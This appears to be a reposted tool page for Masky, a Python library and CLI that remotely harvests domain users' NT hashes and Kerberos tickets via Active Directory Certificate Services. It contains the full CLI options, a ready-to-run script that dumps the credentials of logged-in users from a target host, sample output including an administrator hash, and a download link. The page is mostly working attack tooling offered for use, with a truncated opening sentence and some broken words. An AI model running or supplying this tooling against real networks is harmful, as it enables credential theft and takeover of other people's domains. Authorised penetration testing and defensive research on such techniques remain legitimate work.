Masky – Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory

Masky is a

Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).

  __  __           _
| / | __ _ ___| | ___ _
| |/| |/ _` / __| |/ / | | |
| | | | (_| __ <| |_| |
|_| |_|__,_|___/_|___, |
v0.0.3 |___/

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]

positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)

Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to au thenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVERCA_NAME)

Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
# Define the authentication parameters
ca = "srv-01.sec.labsec-SRV-01-CA"
dc_ip = "192.168.23.148"
domain = "sec.lab"
user = "askywalker"
password = getpass()

# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

# Set a target and run Masky against it
target = "192.168.23.130"
rslts = m.run(target)

# Check if Masky succesfully hijacked at least a user session
# or if an unexpected error occured
if not rslts:
return False

# Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"t - {user.domain}{user.n ame} - {user.nt_hash}")

return True


if __name__ == "__main__":
dump_nt_hashes()

Its execution generate the following output.

$> python3 .masky_demo.py
Password:
Results from hostname: SRV-01
- sechsolo - 05ff4b2d523bc5c21e195e9851e2b157
- secaskywalker - 8928e0723012a8471c0084149c4e23b1
- secadministrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the maskylibresults.py module to check the methods and attributes provided by these two classes.

Acknowledgments

  • Olivier Lyak for the Certipy tool and the associated articles
  • Will Schroeder and Lee Christensen for the Certify tool and the Certified Pre-Owned article
  • Dirk-jan for the PKINITtools and its ADCS NTLM relay article
  • SecureAuthCorp and the associated contributors for the Impacket library
  • Pixis for the tool Lsassy
  • Incognito tool and its Metasploit implementation
  • S3cur3Th1sSh1t for the tool SharpImpersonation and the associated article
  • McAfee for their article regarding the token impersonation techniques
Download Masky

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

Discord

Original Source